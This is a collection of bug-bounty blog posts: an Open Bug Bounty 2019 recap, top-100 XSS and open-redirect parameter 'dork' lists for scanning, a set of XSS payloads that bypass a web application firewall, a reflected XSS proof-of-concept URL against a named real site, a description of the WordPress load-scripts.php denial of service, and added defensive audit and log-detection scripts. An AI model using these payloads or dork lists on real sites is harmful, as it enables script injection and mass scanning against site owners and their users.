Brief Recap of Open Bug Bounty’s Record Growth in 2019

Dear Researchers and Website Owners,

First of all, we wish you a Happy and Secure New Year 2020!

With almost half-a-million vulnerability reports today, we are happy to present you a brief recap of our relentless and steady growth in 2019 attained with your valuable support and contribution that we greatly appreciate:

  • 203,449 security vulnerabilities were reported in total (500 per day), a 32% yearly growth

  • 101,931 vulnerabilities were fixed by website owners, likewise showing a 30% growth compared to the previous year

  • 5,832 new security researchers joined the community, making the total number of researchers and security experts 13,532

  • 383 new bug bounty programs were created by website owners, now offering 657 programs in total with over 1342 websites to test

Best security researchers and top-rated Bug Bounty programs are available on the main page of our website, where we recently refreshed the design.

In 2020, we plan to introduce new features requested by the researchers and website owners to further improve their experience, accelerate smooth communications and reduce vulnerability remediation time.

New DevSecOps vulnerability data export options are also coming soon to facilitate crowd security testing integration with corporate CI/CD and DevSecOps strategy.

We are receiving a considerable number of incoming proposals from commercial companies to support the project, or even to merge with their own solutions and platforms. We may consider one or even several partnerships in 2020 to ensure an even faster development of our project. However, Open Bug Bounty will always remain open, community-driven and free.

Please don’t hesitate to promote our project among your contacts and on social networks!

Thank you for making Web a safer place with us!

Top 100 Open Redirect dorks


Just like the previous list of XSS dorks, but this time for Open Redirect vulnerabilities.

First the most common parameters, then the parameters along with their path.

page 19.3%
url 13.1%
ret 10.0%
r2 9.8%
img 7.0%
u 4.4%
return 2.6%
r 2.6%
URL 2.4%
next 2.0%
redirect 2.0%
redirectBack 1.6%
AuthState 1.2%
referer 0.8%
redir 0.8%
l 0.8%
aspxerrorpath 0.6%
image_path 0.6%
ActionCodeURL 0.6%
return_url 0.6%
link 0.6%
q 0.6%
location 0.6%
ReturnUrl 0.6%
uri 0.4%
referrer 0.4%
returnUrl 0.4%
forward 0.4%
file 0.4%
rb 0.4%
end_display 0.4%
urlact 0.4%
from 0.4%
goto 0.4%
path 0.4%
redirect_url 0.4%
old 0.4%
pathlocation 0.2%
successTarget 0.2%
returnURL 0.2%
urlsito 0.2%
newurl 0.2%
Url 0.2%
back 0.2%
retour 0.2%
odkazujuca_linka 0.2%
r_link 0.2%
cur_url 0.2%
H_name 0.2%
ref 0.2%
topic 0.2%
resource 0.2%
returnTo 0.2%
home 0.2%
node 0.2%
sUrl 0.2%
href 0.2%
linkurl 0.2%
returnto 0.2%
redirecturl 0.2%
SL 0.2%
st 0.2%
errorUrl 0.2%
media 0.2%
destination 0.2%
targeturl 0.2%
return_to 0.2%
cancel_url 0.2%
doc 0.2%
GO 0.2%
ReturnTo 0.2%
anything 0.2%
FileName 0.2%
logoutRedirectURL 0.2%
list 0.2%
startUrl 0.2%
service 0.2%
redirect_to 0.2%
end_url 0.2%
_next 0.2%
noSuchEntryRedirect 0.2%
context 0.2%
returnurl 0.2%
ref_url 0.2%

/?page= 18.5
/index.php?ret= 10.0
/analytics/hit.php?r2= 9.8
/api/thumbnail?img= 7.0
/e.html?u= 3.2
/actions/act_continueapplication.cfm?r= 2.4
/redirect2/?url= 2.0
/Shibboleth.sso/Logout?return= 1.2
/ui/clear-selected/?next= 1.2
/Home/Redirect?url= 1.2
/jobs/?l= 0.8
/Error.aspx?aspxerrorpath= 0.6
/r.php?u= 0.6
/services/logo_handler.ashx?image_path= 0.6
/AddProduct.aspx?ActionCodeURL= 0.6
/tools/login/default.asp?page= 0.6
/spip.php?url= 0.6
/usermanagement/mailGeneratedPassword?referer= 0.6
/?return= 0.6
/?redir= 0.6
/simplesaml/module.php/core/loginuserpass.php?AuthState= 0.6
/out.php?url= 0.6
/affiche.php?uri= 0.4
/redirector.php?url= 0.4
/cgi/set_lang?referrer= 0.4
/blog/click?url= 0.4
/site.php?url= 0.4
/download2.php?file= 0.4
/jump.php?url= 0.4
/redirect/?redirect= 0.4
/admin/track/track?redirect= 0.4
/switch.php?rb= 0.4
/php-scripts/form-handler.php?end_display= 0.4
/cg/rk/?url= 0.4
/tosite.php?url= 0.4
/cambioidioma.php?urlact= 0.4
/accueil/spip.php?url= 0.4
/IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack= 0.4
/search?q= 0.4
/default.aspx?URL= 0.4
/initiate-sso-login/?redirect_url= 0.4
/module.php/core/loginuserpass.php?AuthState= 0.4
/authentication/check_login?old= 0.4
/RedirectToDoc.aspx?URL= 0.4
/shop/bannerhit.php?url= 0.4
/acceptcookies/?ReturnUrl= 0.4
/index.php?url= 0.4
/publang?url= 0.2
/home/helperpage?url= 0.2
/widgets.aspx?url= 0.2
/_lang/en?next= 0.2
/application/en?url= 0.2
/common/topcorm.do?pathlocation= 0.2
/main/action?successTarget= 0.2
/Videos/SetCulture?returnURL= 0.2
/Localize/ChangeLang?returnUrl= 0.2
/_goToSite.asp?urlsito= 0.2
/redir?url= 0.2
/admin/auth/logined?redirect= 0.2
/linkforward?forward= 0.2
/modules/babel/redirect.php?newurl= 0.2
/umbraco/Surface/LanguageSurface/ChangeLanguage?Url= 0.2
/langswitcher.php?url= 0.2
/redirect/?url= 0.2
/i18n/i18n_user_currencies/change_currency?back= 0.2
/accessibilite/textBackUp/?retour= 0.2
/fncBox.php?url= 0.2
/all4shop-akcie.php?odkazujuca_linka= 0.2
/openurl.php?url= 0.2
/te3/out.php?u= 0.2
/utils/set_language.html?return_url= 0.2
/trigger.php?r_link= 0.2
/home/lng?cur_url= 0.2
/goto?url= 0.2
/o.php?url= 0.2
/link-master/19/follow?link= 0.2
/hack.php?H_name= 0.2
/bmad/namhoc.php?return= 0.2
/maven/stats.asp?ref= 0.2
/Main/WebHome?topic= 0.2
/bin/fusion/imsLogin?resource= 0.2
/languechange.aspx?url= 0.2
/bloques/bannerclick.php?url= 0.2
/changesiteversion-full?referer= 0.2
/out.php?link= 0.2
/bgpage?r= 0.2
/signout?returnTo= 0.2
/switch_lang.php?return_url= 0.2
/nousername.php?redir= 0.2
/i/logout?return= 0.2
/util_goto_detail_home.cfm?home= 0.2
/misc/oldmenu.html?from= 0.2
/click.php?url= 0.2
/bitrix/rdc/?goto= 0.2
/?node= 0.2
/setLanguage.php?return= 0.2
/redirect/ad?url= 0.2
/redirect.php?sUrl= 0.2
/redirect?url= 0.2
/url?url= 0.2
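
For site owners, the parameter names above are a checklist of where to look in your own traffic. The following is an added example, not part of the original post: it inspects a request URL and reports redirect-style parameters whose value would send the browser to another host. The function names, the chosen subset of parameters and the `shop.example` host are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

# Lower-cased subset of the parameter names listed above.
REDIRECT_PARAMS = {
    "page", "url", "ret", "u", "return", "r", "next", "redirect", "redir",
    "return_url", "returnurl", "goto", "redirect_url", "returnto",
    "return_to", "redirect_to", "destination", "forward", "back",
}

def offsite_reason(value, own_hosts):
    """Why a redirect value would leave the site, or None if it stays local."""
    # Browsers treat '\' like '/' in http(s) URLs, so normalise before parsing.
    candidate = value.strip().replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return "unparseable"
    scheme = parts.scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return "scheme:" + scheme
    if scheme and not parts.netloc:
        return "scheme-without-host"   # e.g. "https:other.example"
    if parts.netloc:                   # absolute or scheme-relative (//host)
        host = (parts.hostname or "").lower()
        return None if host in own_hosts else "host:" + host
    return None                        # plain path or a non-URL value

def audit_request(url, own_hosts):
    """(parameter, reason) pairs for redirect-style parameters pointing off-site."""
    findings = []
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in REDIRECT_PARAMS:
            reason = offsite_reason(value, own_hosts)
            if reason:
                findings.append((name, reason))
    return findings

if __name__ == "__main__":
    # Constructed sample requests for a site served from shop.example.
    own = {"shop.example"}
    for u in ("https://shop.example/?next=%2Faccount&page=2",
              "https://shop.example/signout?returnTo=%2F%5Cother.example"):
        print(u, audit_request(u, own))
```

The same `offsite_reason` check can gate the redirect itself: issue the redirect only when it returns `None`, and fall back to a fixed local page otherwise.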

XSS WAF Bypassed

</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)

</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)

<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)

<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)

‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`con\x66irm`]`1`//><svg> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)

Thank you, and best regards!!!

Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Paypal : paypal.me/Rando784

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerable parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with the corresponding path:

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Congrats on 1000 badges OBB

Wanted to start my blog by celebrating 1000 combined honor badges by OBB community! 🙂

Hip hip hooray!

Awesome job made by the community, if only the site owners could take submitted findings more seriously! Personally I find that a lot of alerted site owners just seem to throw the information provided in their garbage, and it makes me sad.

Good luck next year everyone! May the hunt be bountiful!

-m00n

Reflected xss in 360totalsecurity

I have found a vulnerability in 360totalsecurity: a Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce:

Go to https://blog.360totalsecurity.com

and to: https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>

Regards,

TAHA

Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[]; the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested.

What can be concluded from this URL is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.

I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it and sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.
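
The behaviour described above leaves a clear trace in web server logs: a load-scripts.php request naming far more modules than any normal page needs, answered with an unusually large response. The following detection sketch is an added example, not code from the original post or from WordPress. The log format (common/combined), the function names, the threshold of 50 handles and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common/combined log format: client IP, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def count_handles(target):
    """Distinct modules named in a load-scripts.php request, else None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != "load-scripts.php":
        return None
    handles = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Accept load=..., load[]=... and indexed forms such as load[0]=...
        if name == "load" or name.startswith("load["):
            handles.update(h for h in value.split(",") if h)
    return len(handles)

def flag_bulk_loads(lines, max_handles=50):
    """(ip, handle_count, response_bytes) for requests above the threshold."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        n = count_handles(m.group("target"))
        if n is not None and n > max_handles:
            size = 0 if m.group("size") == "-" else int(m.group("size"))
            findings.append((m.group("ip"), n, size))
    return findings

# Constructed sample log lines; handle names and addresses are placeholders.
ALL_HANDLES = ",".join(f"handle{i}" for i in range(181))
SAMPLE_LOG = [
    '198.51.100.4 - - [02/Jan/2020:10:00:01 +0000] '
    '"GET /wp-admin/load-scripts.php?load%5B%5D=jquery-ui-core HTTP/1.1" 200 20480',
    '203.0.113.7 - - [02/Jan/2020:10:00:05 +0000] '
    f'"GET /wp-admin/load-scripts.php?load%5B%5D={ALL_HANDLES} HTTP/1.1" 200 3900000',
    '198.51.100.4 - - [02/Jan/2020:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, n, size in flag_bulk_loads(SAMPLE_LOG):
        print(f"{ip} requested {n} modules in one call ({size} bytes returned)")
```

Counting flagged requests per client over a short window turns this into an alert or a rate-limit rule for the endpoint.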